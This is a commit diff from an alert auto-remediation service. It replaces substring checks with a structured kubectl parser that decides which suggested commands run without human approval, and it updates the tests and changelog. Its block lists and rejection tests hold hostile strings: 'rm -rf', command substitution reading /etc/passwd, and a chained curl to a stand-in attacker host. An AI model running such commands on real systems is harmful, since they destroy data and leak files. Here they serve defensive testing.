fix(auto): use action parser for repair gates
Some checks failed
CD Pipeline / tests (push) Failing after 1m2s
CD Pipeline / build-and-deploy (push) Has been skipped
CD Pipeline / post-deploy-checks (push) Has been skipped
Code Review / ai-code-review (push) Successful in 24s

This commit is contained in:
Your Name
2026-04-30 14:06:09 +08:00
parent 9ee3cc6242
commit ed2a4838f2
11 changed files with 279 additions and 60 deletions

View File

@@ -34,6 +34,7 @@ from pydantic import BaseModel, Field
from src.core.config import settings
from src.core.constants import is_cicd_alertname, is_heartbeat_alertname
from src.services.alert_rule_engine import get_incident_type, match_rule
from src.services.action_parser import is_safe_kubectl_action
from src.core.logging import get_logger
from src.core.metrics import record_alert_chain_success
@@ -1059,15 +1060,13 @@ async def receive_alert(
# 設計confidence ≥ 0.85 + 非 CRITICAL + 非破壞性 + 有 kubectl 指令 → 直接執行
# 安全防線CRITICAL / destructive patterns / NO_ACTION/INVESTIGATE/OBSERVE / 空 kubectl → 降級 PENDING
if analysis_result:
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS as _cs1_destr_patterns
_cs1_kubectl = analysis_result.kubectl_command.strip() if analysis_result.kubectl_command else ""
_cs1_can_auto = (
bool(_cs1_kubectl)
and analysis_result.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and _sa_val not in _non_destructive_actions
and not any(p in _cs1_kubectl.lower() for p in _cs1_destr_patterns)
and is_safe_kubectl_action(_cs1_kubectl)
)
if _cs1_can_auto:
try:
@@ -1396,15 +1395,13 @@ async def _process_new_alert_background(
# 設計is_rule_based=True 確定性高,滿足條件直接執行,不等人工審核
# 安全防線CRITICAL / destructive patterns / NO_ACTION / 空 kubectl → 全部降級 PENDING
try:
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
from src.models.approval import ApprovalRequest, ApprovalStatus
from src.services.approval_execution import ApprovalExecutionService
_destructive_set = set(p.lower() for p in _DESTRUCTIVE_PATTERNS)
_can_auto = (
bool(rule_kubectl)
and rule_risk != RiskLevel.CRITICAL
and not any(p in rule_kubectl.lower() for p in _destructive_set)
and is_safe_kubectl_action(rule_kubectl)
and "NO_ACTION" not in rule_action
)
if _can_auto:
@@ -1576,14 +1573,13 @@ async def _process_new_alert_background(
logger.warning("shadow_auto_approve_failed", error=str(_shadow_err_cs3))
# 2026-04-27 Claude Sonnet 4.6: CS3 LLM 高信心自動執行修法3擴展
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS as _cs3_destr_patterns # noqa: PLC0415
_cs3_kubectl = (analysis_result.kubectl_command or "").strip()
_cs3_can_auto = (
bool(_cs3_kubectl)
and analysis_result.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and "NO_ACTION" not in (analysis_result.action_title or "")
and not any(p in _cs3_kubectl.lower() for p in _cs3_destr_patterns)
and is_safe_kubectl_action(_cs3_kubectl)
)
if _cs3_can_auto:
try:

View File

@@ -57,6 +57,8 @@ class ActionKind(StrEnum):
READONLY = "readonly"
ROLLOUT = "rollout"
SCALE = "scale"
AUTOSCALE = "autoscale"
SET_RESOURCES = "set_resources"
DELETE_POD = "delete_pod"
@@ -81,13 +83,29 @@ def is_safe_kubectl_action(command: str) -> bool:
return parse_kubectl_action(command).ok
def kubectl_safety_reason(command: str) -> str | None:
"""Return None for a safe kubectl command, otherwise the parser reason.
Non-kubectl commands are outside this parser's scope and return None so
SSH / host-repair gates can keep their own policy.
"""
command = (command or "").strip()
if not command.lower().startswith("kubectl"):
return None
parsed = parse_kubectl_action(command)
return None if parsed.ok else parsed.reason
def parse_kubectl_action(command: str) -> ParsedKubectlAction:
"""Parse and validate a kubectl command for auto-execute safety.
The grammar is intentionally narrow:
- readonly: get/describe/logs/top/version with bounded, known-safe flags
- rollout: rollout restart/undo on workload resources
- rollout: rollout restart on workload resources
- scale: scale deployment/statefulset to a positive replica count
- autoscale: HPA bounds on deployment/statefulset with positive min/max
- set resources: CPU/memory requests/limits on deployment/statefulset
- delete: delete one pod by name only
"""
@@ -124,6 +142,10 @@ def parse_kubectl_action(command: str) -> ParsedKubectlAction:
return _parse_rollout(rest, namespace, namespace_flags)
if verb == "scale":
return _parse_scale(rest, namespace, namespace_flags)
if verb == "autoscale":
return _parse_autoscale(rest, namespace, namespace_flags)
if verb == "set":
return _parse_set(rest, namespace, namespace_flags)
if verb == "delete":
return _parse_delete(rest, namespace, namespace_flags)
return _reject("unsupported_verb")
@@ -241,7 +263,7 @@ def _parse_rollout(
if len(tokens) < 2:
return _reject("rollout_missing_args")
subverb = tokens[0]
if subverb not in {"restart", "undo"}:
if subverb != "restart":
return _reject("unsupported_rollout_subverb")
resource_type, resource_name, rest = _split_resource_ref(tokens[1:])
@@ -308,6 +330,104 @@ def _parse_scale(
)
def _parse_autoscale(
    tokens: list[str],
    namespace: str | None,
    namespace_flags: list[str],
) -> ParsedKubectlAction:
    """Validate the arguments that follow ``kubectl autoscale``.

    The target must be a resource type listed in ``_SCALABLE_RESOURCES`` with a
    non-empty name. Only ``--min``, ``--max`` and ``--cpu-percent`` are
    accepted, each with a value of at least 1. ``--min`` and ``--max`` are both
    mandatory, ``--max`` may not be below ``--min``, and ``--cpu-percent`` may
    not exceed 100. When a flag is repeated, the last occurrence wins.

    Args:
        tokens: Tokens after the ``autoscale`` verb.
        namespace: Namespace already extracted by the caller, if any.
        namespace_flags: Namespace flag tokens to carry into the result.

    Returns:
        An ``ok`` ``ParsedKubectlAction`` of kind ``AUTOSCALE``, or whatever
        ``_reject`` returns for the first violated rule.
    """
    resource_type, resource_name, rest = _split_resource_ref(tokens)
    if resource_type not in _SCALABLE_RESOURCES or not resource_name:
        return _reject("invalid_autoscale_resource")

    accepted_flags = {"--min", "--max", "--cpu-percent"}
    bounds: dict[str, int] = {}
    kept_flags: list[str] = []
    cursor = 0
    while cursor < len(rest):
        flag, raw_value, width = _consume_required_flag_value(
            rest,
            cursor,
            accepted_flags,
        )
        if not flag or raw_value is None:
            return _reject("unsupported_autoscale_flag")
        number = _parse_positive_int(raw_value)
        if number < 1:
            return _reject("autoscale_value_must_be_positive")
        # Keyed by flag, so a repeated flag overwrites the earlier value.
        bounds[flag] = number
        kept_flags += rest[cursor:cursor + width]
        cursor += width

    floor = bounds.get("--min")
    ceiling = bounds.get("--max")
    if floor is None or ceiling is None:
        return _reject("autoscale_min_max_required")
    if ceiling < floor:
        return _reject("autoscale_max_below_min")
    cpu_target = bounds.get("--cpu-percent")
    if cpu_target is not None and cpu_target > 100:
        return _reject("autoscale_cpu_percent_out_of_range")

    return ParsedKubectlAction(
        ok=True,
        reason="ok",
        kind=ActionKind.AUTOSCALE,
        verb="autoscale",
        resource_type=resource_type,
        resource_name=resource_name,
        namespace=namespace,
        flags=tuple(namespace_flags + kept_flags),
    )
def _parse_set(
    tokens: list[str],
    namespace: str | None,
    namespace_flags: list[str],
) -> ParsedKubectlAction:
    """Validate the arguments that follow ``kubectl set``.

    Only the ``resources`` sub-verb is supported. The target must be a resource
    type listed in ``_SCALABLE_RESOURCES`` with a non-empty name, and every
    remaining token must be a ``--limits`` / ``--requests`` flag whose value
    passes ``_resource_quantity_assignments_safe``. At least one such flag is
    required.

    Args:
        tokens: Tokens after the ``set`` verb.
        namespace: Namespace already extracted by the caller, if any.
        namespace_flags: Namespace flag tokens to carry into the result.

    Returns:
        An ``ok`` ``ParsedKubectlAction`` of kind ``SET_RESOURCES``, or whatever
        ``_reject`` returns for the first violated rule.
    """
    subverb = tokens[0] if tokens else None
    if subverb != "resources":
        return _reject("unsupported_set_subverb")

    resource_type, resource_name, rest = _split_resource_ref(tokens[1:])
    if resource_type not in _SCALABLE_RESOURCES or not resource_name:
        return _reject("invalid_set_resources_target")

    accepted_flags = {"--limits", "--requests"}
    kept_flags: list[str] = []
    cursor = 0
    while cursor < len(rest):
        flag, raw_value, width = _consume_required_flag_value(
            rest,
            cursor,
            accepted_flags,
        )
        if not flag or raw_value is None:
            return _reject("unsupported_set_resources_flag")
        if not _resource_quantity_assignments_safe(raw_value):
            return _reject("invalid_resource_quantity")
        kept_flags.extend(rest[cursor:cursor + width])
        cursor += width

    # Each accepted flag contributes at least one token, so an empty list
    # means no --limits / --requests flag was supplied.
    if not kept_flags:
        return _reject("set_resources_requires_limits_or_requests")

    return ParsedKubectlAction(
        ok=True,
        reason="ok",
        kind=ActionKind.SET_RESOURCES,
        verb="set",
        subverb="resources",
        resource_type=resource_type,
        resource_name=resource_name,
        namespace=namespace,
        flags=tuple(namespace_flags + kept_flags),
    )
def _parse_delete(
tokens: list[str],
namespace: str | None,
@@ -339,6 +459,43 @@ def _parse_positive_int(value: str) -> int:
return int(value)
def _consume_required_flag_value(
tokens: list[str],
index: int,
allowed_flags: set[str],
) -> tuple[str | None, str | None, int]:
token = tokens[index]
if "=" in token:
flag, value = token.split("=", 1)
if flag not in allowed_flags or not value:
return None, None, 1
return flag, value, 1
if token not in allowed_flags or index + 1 >= len(tokens):
return None, None, 1
value = tokens[index + 1]
if not value or value.startswith("-"):
return None, None, 1
return token, value, 2
def _resource_quantity_assignments_safe(value: str) -> bool:
parts = value.split(",")
if not parts:
return False
for part in parts:
key, separator, quantity = part.partition("=")
if separator != "=":
return False
if key not in {"cpu", "memory"}:
return False
if not quantity or not set(quantity) <= _SAFE_TOKEN_CHARS:
return False
if quantity in {"0", "0m", "0Mi", "0Gi"}:
return False
return True
def _flags_allowed(tokens: list[str], allowed_flags: set[str]) -> bool:
i = 0
while i < len(tokens):

View File

@@ -32,6 +32,7 @@ import structlog
import yaml
from src.constants.alert_types import ALERTNAME_TO_TYPE
from src.services.action_parser import parse_kubectl_action
logger = structlog.get_logger(__name__)
@@ -43,19 +44,17 @@ _generating: set[str] = set()
# Redis 分散式鎖 TTL (秒),覆蓋 Ollama + Gemini 最長生成時間
_RULE_GEN_LOCK_TTL = 120
# ── kubectl 注入防護 (Task 2.3, ADR-076, 2026-04-14) ─────────
# 對齊 auto_approve._DESTRUCTIVE_PATTERNS + decision_manager._ALLOWED_KUBECTL_PATTERN
# 目標: 規則 YAML 中的 kubectl_command 在變數替換後若含下列破壞性模式 → 清空並告警
_RULE_ENGINE_DESTRUCTIVE_RE = re.compile(
r"(kubectl\s+delete\s+(pvc|namespace|statefulset|deployment)" # 破壞性 K8s 刪除
r"|kubectl\s+(drain|cordon)" # 節點驅逐/封鎖
r"|--replicas=\s*0\b" # 縮容至零
r"|rm\s+-[rf]{1,2}\s" # rm -rf
r"|\bdrop\s+(table|database)\b" # SQL 破壞性 DDL
r"|\$\([^)]{0,200}\)" # shell 命令替換 $(...)
r"|`[^`]{0,200}`" # 反引號替換
r")",
re.IGNORECASE,
# ── action parser 注入防護 (SPF-2, 2026-04-30) ───────────────
# kubectl 走 structured token parser非 kubectl 保留簡單 dangerous-fragment
# 掃描,避免舊式巨型 regex 誤殺安全的單一 delete pod / deployment resource forms。
_RULE_ENGINE_DANGEROUS_FRAGMENTS = (
"rm -rf",
"rm -f /",
"drop table",
"drop database",
"truncate table",
"$(",
"`",
)
# ── kubectl 注入防護 公開 API ───────────────────────────────
@@ -63,7 +62,7 @@ _RULE_ENGINE_DESTRUCTIVE_RE = re.compile(
def validate_kubectl_command(command: str) -> bool:
"""
kubectl 注入安全驗證Task 2.3, ADR-076
Action 注入安全驗證Task 2.3, ADR-076; SPF-2 parser upgrade)。
Returns:
True — 指令安全,可執行
@@ -74,18 +73,19 @@ def validate_kubectl_command(command: str) -> bool:
- "ssh ..." 開頭 — SSH 層指令,不走 kubectl 路徑
阻擋條件(返回 False:
- kubectl delete pvc/namespace/statefulset/deployment — 破壞性刪除
- kubectl drain / cordon — 節點驅逐(業務衝擊
- --replicas=0 — 縮容至零(服務停止)
- rm -rf — 主機層破壞
- DROP TABLE/DATABASE — SQL 破壞性 DDL
- $(...) 或反引號 — Shell 命令注入
- kubectl parser 不支援的語法deployment delete / drain / cordon /
replicas=0 / shell metachar / compound command
- 非 kubectl 指令內含主機/SQL/command-substitution 危險片段
"""
command = (command or "").strip()
if not command:
return True
if command.strip().startswith("ssh "):
if command.startswith("ssh "):
return True
return not bool(_RULE_ENGINE_DESTRUCTIVE_RE.search(command))
if command.startswith("kubectl"):
return parse_kubectl_action(command).ok
command_lower = command.lower()
return not any(fragment in command_lower for fragment in _RULE_ENGINE_DANGEROUS_FRAGMENTS)
# ── 變數提取 ────────────────────────────────────────────────

View File

@@ -26,6 +26,7 @@ from typing import Any
import structlog
from src.models.playbook import Playbook
from src.services.action_parser import parse_kubectl_action
from src.services.playbook_rag import PlaybookMatch
from src.services.trust_engine import TrustScoreManager, get_trust_manager
@@ -105,7 +106,9 @@ _DESTRUCTIVE_PATTERNS: list[str] = [
"replicas=0", # 任何形式的 replicas=0
# --- K8s 刪除操作 ---
"delete pod", # 強制刪除 pod (kubectl delete pod / pods)
"delete pod --all", # 批次刪除 pod
"delete pod -A", # 跨 namespace 刪除 pod
"delete pod --all-namespaces",
"delete pods", # 複數形式
"delete deployment", # 刪除 deployment
"delete pvc", # 刪除 PVC (資料丟失)
@@ -263,20 +266,36 @@ class AutoApprovePolicy:
confidence=confidence,
)
# 條件 1b: 破壞性指令攔截 (ADR-070: 2026-04-11 Claude Sonnet 4.6)
# 即使是 low/medium risk以下操作仍需人工確認
# 原則: 可恢復操作 → 自動執行; 不可逆 / 業務衝擊 → 人工
# M1+C3 修復 2026-04-11 (Code Review): 移至模組常量 + 補全 K8s/Docker 高風險操作
action_lower = action.lower()
for pattern in _DESTRUCTIVE_PATTERNS:
if pattern in action_lower:
# 條件 1b: structured action parser 安全閘 (SPF-2, 2026-04-30)
# kubectl 指令以 token grammar 判斷,避免 substring regex 誤殺
# `kubectl delete pod <one-pod>`,同時攔截 delete deployment /
# delete --all / rollout undo / replicas=0 / shell injection。
action_stripped = action.strip()
action_lower = action_stripped.lower()
kubectl_cmd_raw = str(proposal_data.get("kubectl_command", "") or "").strip()
kubectl_candidate = kubectl_cmd_raw
if not kubectl_candidate and "kubectl" in action_lower:
kubectl_candidate = action_stripped[action_lower.index("kubectl"):].strip()
if kubectl_candidate.lower().startswith("kubectl"):
parsed_action = parse_kubectl_action(kubectl_candidate)
if not parsed_action.ok:
return self._reject(
reason=AutoApproveReason.CRITICAL_OPERATION,
detail=f"Destructive pattern detected: '{pattern}' in action — requires human approval",
detail=f"kubectl action parser rejected action: {parsed_action.reason} — requires human approval",
risk_level=risk_level,
trust_score=trust_score,
confidence=confidence,
)
else:
for pattern in _DESTRUCTIVE_PATTERNS:
if pattern in action_lower:
return self._reject(
reason=AutoApproveReason.CRITICAL_OPERATION,
detail=f"Destructive pattern detected: '{pattern}' in action — requires human approval",
risk_level=risk_level,
trust_score=trust_score,
confidence=confidence,
)
# 條件 1c: 無可執行指令 → 拒絕自動執行2026-04-16 ogt + Claude Sonnet 4.6
# 根因INVALID_TARGET 導致 rule engine 清空 kubectl_commandaction 為空

View File

@@ -18,6 +18,8 @@ from src.services.action_parser import (
"kubectl rollout restart deployment awoooi-api -n awoooi-prod",
"kubectl -n awoooi-prod rollout restart deploy/awoooi-api",
"kubectl scale deployment awoooi-api --replicas=3 -n awoooi-prod",
"kubectl autoscale deployment awoooi-api --cpu-percent=70 --min=2 --max=5 -n awoooi-prod",
"kubectl set resources deployment/awoooi-api --limits=cpu=2000m,memory=1Gi -n awoooi-prod",
"kubectl delete pod awoooi-api-7d6b776f78-4sgjl -n awoooi-prod",
"kubectl get pods -n awoooi-prod",
"kubectl describe node k3s-node-01",
@@ -33,10 +35,14 @@ def test_safe_kubectl_actions_pass(cmd):
"kubectl get pods -n prod $(echo injected)",
"kubectl rollout restart deployment/$(cat /etc/passwd)",
"kubectl rollout restart deployment/awoooi-api; rm -rf / -n prod",
"kubectl rollout undo deployment/awoooi-api -n prod",
"kubectl get pods -n prod && curl http://attacker.invalid",
"kubectl delete deployment awoooi-api -n awoooi-prod",
"kubectl delete pods --all -n awoooi-prod",
"kubectl delete pod awoooi-api-7d6b776f78-4sgjl --force -n awoooi-prod",
"kubectl scale deployment awoooi-api --replicas=0 -n awoooi-prod",
"kubectl autoscale deployment awoooi-api --min=5 --max=2 -n awoooi-prod",
"kubectl set resources deployment/awoooi-api --limits=ephemeral-storage=10Gi -n awoooi-prod",
"kubectl patch deployment awoooi-api -p spec -n awoooi-prod",
"ssh 192.168.0.188 docker restart openclaw",
])

View File

@@ -62,18 +62,18 @@ class TestValidKubectlCommands:
"""常見合法 kubectl 指令應通過"""
assert validate_kubectl_command(cmd) is True
def test_kubectl_exec_with_psql(self):
"""kubectl exec 查詢(含 SQL SELECT→ 通過"""
def test_kubectl_exec_with_psql_is_not_auto_executable(self):
"""kubectl exec 可執行任意 shell必須降級人工"""
cmd = (
"kubectl exec -n awoooi-prod deployment/postgresql -- "
"psql -U postgres -c 'SELECT pg_terminate_backend(pid) FROM pg_stat_activity;'"
)
assert validate_kubectl_command(cmd) is True
assert validate_kubectl_command(cmd) is False
def test_kubectl_get_with_jq(self):
"""kubectl get + pipe → 通過"""
def test_compound_kubectl_get_is_not_auto_executable(self):
"""compound shell 指令必須降級人工"""
cmd = "kubectl get pods -n monitoring && curl -s http://192.168.0.120:9093/api/v1/status"
assert validate_kubectl_command(cmd) is True
assert validate_kubectl_command(cmd) is False
# =============================================================================

View File

@@ -64,7 +64,7 @@ def _run_cs1_block(
回傳 (mock_executor_class, mock_execute_method)
"""
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
from src.services.action_parser import is_safe_kubectl_action
mock_exec_instance = MagicMock()
if exec_side_effect is not None:
@@ -94,7 +94,7 @@ def _run_cs1_block(
and analysis_result.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and _sa_val not in _non_destructive_actions
and not any(p in _cs1_kubectl.lower() for p in _DESTRUCTIVE_PATTERNS)
and is_safe_kubectl_action(_cs1_kubectl)
)
if _cs1_can_auto:
import asyncio
@@ -155,6 +155,15 @@ class TestCS1AutoExecuteConditions:
_, mock_exec = _run_cs1_block(analysis, RiskLevel.LOW)
mock_exec.execute_approved_action.assert_not_called()
def test_single_delete_pod_executes(self):
"""單一 Pod delete 是可恢復操作parser 不應誤殺"""
analysis = _make_analysis(
confidence=0.90,
kubectl_command="kubectl delete pod api-xxx-yyy -n prod",
)
_, mock_exec = _run_cs1_block(analysis, RiskLevel.LOW)
mock_exec.execute_approved_action.assert_called_once()
def test_no_action_does_not_execute(self):
"""suggested_action=NO_ACTION → 不執行"""
analysis = _make_analysis(
@@ -182,7 +191,7 @@ class TestCS1AutoExecuteFailureDegradation:
analysis = _make_analysis(confidence=0.90)
# 直接測試條件邏輯,確保例外被吞掉
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
from src.services.action_parser import is_safe_kubectl_action
_non_destructive_actions = {"NO_ACTION", "INVESTIGATE", "OBSERVE"}
_sa_val = analysis.suggested_action.value
@@ -192,7 +201,7 @@ class TestCS1AutoExecuteFailureDegradation:
and analysis.confidence >= 0.85
and RiskLevel.LOW != RiskLevel.CRITICAL
and _sa_val not in _non_destructive_actions
and not any(p in _cs1_kubectl.lower() for p in _DESTRUCTIVE_PATTERNS)
and is_safe_kubectl_action(_cs1_kubectl)
)
assert _cs1_can_auto, "前置條件必須為 True 才能測試降級"

View File

@@ -35,13 +35,14 @@ def _make_analysis(
def _can_auto(analysis, risk_level, patterns):
from src.models.approval import RiskLevel
from src.services.action_parser import is_safe_kubectl_action
kubectl = (analysis.kubectl_command or "").strip()
return (
bool(kubectl)
and analysis.confidence >= 0.85
and risk_level != RiskLevel.CRITICAL
and "NO_ACTION" not in (analysis.action_title or "")
and not any(p in kubectl.lower() for p in patterns)
and is_safe_kubectl_action(kubectl)
)
@@ -78,9 +79,14 @@ class TestCS3AutoExecute:
a = _make_analysis(action_title="NO_ACTION: no fix needed")
assert _can_auto(a, RiskLevel.MEDIUM, patterns) is False
def test_destructive_delete_blocked(self, patterns):
def test_single_delete_pod_eligible(self, patterns):
from src.models.approval import RiskLevel
a = _make_analysis(kubectl="kubectl delete pod foo-123")
assert _can_auto(a, RiskLevel.MEDIUM, patterns) is True
def test_delete_pods_all_blocked(self, patterns):
from src.models.approval import RiskLevel
a = _make_analysis(kubectl="kubectl delete pods --all -n prod")
assert _can_auto(a, RiskLevel.MEDIUM, patterns) is False
def test_destructive_force_check(self, patterns):

View File

@@ -53,16 +53,22 @@ class TestDestructivePatternsBlocked:
def test_scale_to_zero_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl scale deployment api --replicas=0"))
assert not d.should_auto_approve
assert "Destructive pattern" in d.reason_detail
assert "parser rejected" in d.reason_detail
def test_delete_deployment_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl delete deployment api-server"))
assert not d.should_auto_approve
assert "Destructive pattern" in d.reason_detail
assert "parser rejected" in d.reason_detail
def test_delete_pod_blocked(self, policy):
def test_delete_pod_allowed_by_parser(self, policy):
d = policy.evaluate(self._proposal("kubectl delete pod api-server-abc123"))
assert d.should_auto_approve
assert "Destructive pattern" not in d.reason_detail
def test_delete_pod_force_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl delete pod api-server-abc123 --force"))
assert not d.should_auto_approve
assert "parser rejected" in d.reason_detail
def test_delete_pods_plural_blocked(self, policy):
d = policy.evaluate(self._proposal("kubectl delete pods --all -n awoooi-prod"))

View File

@@ -19,6 +19,7 @@ CS2 規則引擎自動執行條件邏輯測試
"""
from src.models.approval import RiskLevel
from src.services.action_parser import is_safe_kubectl_action
from src.services.auto_approve import _DESTRUCTIVE_PATTERNS
@@ -31,11 +32,10 @@ def _evaluate_can_auto(
複製 webhooks.py CS2 路徑的 _can_auto 邏輯,用於單元測試。
任何修改 webhooks.py 邏輯的人,必須同步更新此函數。
"""
_destructive_set = set(p.lower() for p in _DESTRUCTIVE_PATTERNS)
return (
bool(rule_kubectl)
and rule_risk != RiskLevel.CRITICAL
and not any(p in rule_kubectl.lower() for p in _destructive_set)
and is_safe_kubectl_action(rule_kubectl)
and "NO_ACTION" not in rule_action
)
@@ -90,12 +90,12 @@ class TestCS2CanAutoConditions:
# ── 防線 3DESTRUCTIVE_PATTERNS ────────────────────────────────────
def test_delete_pod_returns_false(self):
def test_single_delete_pod_returns_true(self):
assert _evaluate_can_auto(
rule_kubectl="kubectl delete pod api-xxx-yyy -n prod",
rule_risk=RiskLevel.LOW,
rule_action="刪除 Pod | kubectl delete pod api-xxx-yyy -n prod",
) is False
) is True
def test_delete_pods_returns_false(self):
assert _evaluate_can_auto(
@@ -104,6 +104,13 @@ class TestCS2CanAutoConditions:
rule_action="刪除所有 Pod | kubectl delete pods --all -n prod",
) is False
def test_delete_pod_force_returns_false(self):
assert _evaluate_can_auto(
rule_kubectl="kubectl delete pod api-xxx-yyy --force -n prod",
rule_risk=RiskLevel.LOW,
rule_action="強制刪除 Pod | kubectl delete pod api-xxx-yyy --force -n prod",
) is False
def test_scale_to_zero_returns_false(self):
assert _evaluate_can_auto(
rule_kubectl="kubectl scale deployment/api --replicas=0 -n prod",

View File

@@ -6,6 +6,19 @@
---
## 2026-04-30 | SPF-2 action parser 收斂 — 告警自動修復安全閘
承接 Wave A「告警→自動修復」阻塞點將 CS1/CS2/CS3 自動執行路徑從 substring destructive patterns 收斂到 structured kubectl action parser。
### 完成
- `action_parser.py` 擴充安全語法rollout restart、scale 正整數、autoscale 正 min/max、set resources CPU/memory、單一 Pod delete、read-only get/describe/logs/top/version。
- `webhooks.py` CS1 / CS2 / CS3 全部改用 `is_safe_kubectl_action()`,避免 `_DESTRUCTIVE_PATTERNS` 誤殺 `kubectl delete pod <one-pod>`
- `auto_approve.py` kubectl action 先走 parser非 kubectl / SSH 再走 legacy dangerous fragments`delete pod --all``delete deployment``rollout undo``replicas=0`、shell injection 仍阻擋。
- `alert_rule_engine.validate_kubectl_command()` 由巨型 regex 改為 parser-backed gatecompound shell / `kubectl exec` 自動降級人工。
### 驗證
- `PYTHONPATH=apps/api python3 -m pytest apps/api/tests/test_action_parser_safety.py apps/api/tests/test_alert_rule_engine_validation.py apps/api/tests/test_rule_engine_auto_execute.py apps/api/tests/test_cs3_auto_execute.py apps/api/tests/test_cs1_auto_execute.py apps/api/tests/test_destructive_patterns.py -q` → 123 passed。
## 2026-04-30 | CD Runner 拆段 — host build/deploy
承接 `RWLayer ... unexpectedly nil` 持續打斷 Gitea CD 的問題。第一層 `capacity: 1` + Docker lock 可阻止跨 repo 並行,但長時間 Web build 仍會讓 transient act job container 在 build 收尾消失。